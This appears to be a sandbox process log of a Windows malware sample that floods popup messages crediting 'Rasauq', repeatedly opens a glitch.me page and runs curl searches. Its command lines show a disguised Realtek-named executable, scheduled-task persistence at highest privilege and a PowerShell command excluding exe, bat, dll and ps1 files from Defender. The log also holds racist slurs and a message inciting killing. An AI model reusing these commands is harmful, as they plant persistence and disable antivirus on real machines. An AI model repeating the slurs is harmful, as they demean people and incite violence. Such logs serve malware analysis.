"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13800,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13812 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=13988,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14004 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=13984,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14024 /prefetch:14

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=13960,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13976 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=13640,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14604 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=14864,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14752 /prefetch:1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=15120,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15168 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=5320,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15480 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=15388,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=15600,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15740 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=15880,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15932 /prefetch:1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=16136,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16176 /prefetch:1

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=16280,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16304 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=16452,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16516 /prefetch:1

C:\Users\Admin\AppData\Local\Windows Host Service.scr

"C:\Users\Admin\AppData\Local\Windows Host Service.scr"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=16740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16760 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=17332,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17368 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=4744,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17696 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=17888,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17920 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=18740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17880 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=19540,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=19528 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=19940,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=19968 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=732,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20124 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=20140,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=19600 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=20148,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20088 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=20260,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20284 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=20268,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20468 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=20784,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20772 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=20960,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20924 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --always-read-main-dll --field-trial-handle=21180,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20812 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

